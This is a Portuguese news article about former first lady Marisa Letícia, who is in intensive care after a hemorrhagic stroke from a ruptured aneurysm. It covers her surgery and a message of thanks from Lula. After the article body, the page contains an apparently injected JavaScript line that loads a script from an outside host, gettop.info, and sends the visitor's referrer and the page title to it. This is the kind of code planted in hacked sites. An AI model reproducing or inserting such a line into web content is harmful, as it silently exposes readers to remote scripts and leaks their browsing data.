Sem previsão de alta, Marisa Letícia segue internada em UTI

A ex-primeira dama Marisa Letícia segue internada na  Unidade de Terapia Intensiva (UTI) do Hospital Sírio-Libanês, em São Paulo, nesta quarta-feira (25). Marisa sofreu um acidente vascular cerebral (AVC) hemorrágico ontem (24). Não há previsão para a divulgação de um novo boletim médico de Marisa Letícia, informa a assessoria de imprensa do hospital.

Dona Marisa passou por uma cirurgia de emergência na terça-feira (24), que durou cerca de 2h. Segundo o chefe da equipe médica que cuida de Marisa, Dr. Roberto Kalil Filho, o AVC é em decorrência do rompimento de um aneurisma (dilatação da artéria), que foi diagnosticado há 10 anos. Porém, na época, não havia indicação cirúrgica, apenas acompanhamento médico.

A equipe médica classificou o estado de saúde de Marisa como estável e que tudo está saindo conforme o previsto.

Lula

O ex-presidente da República Luiz Inácio Lula da Silva utilizou as redes sociais para agradecer as mensagens de apoio. “Obrigado por todo o carinho e pensamentos positivos. Agora, é aguardar a recuperação com muita fé”, disse em nota.

 
 
 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário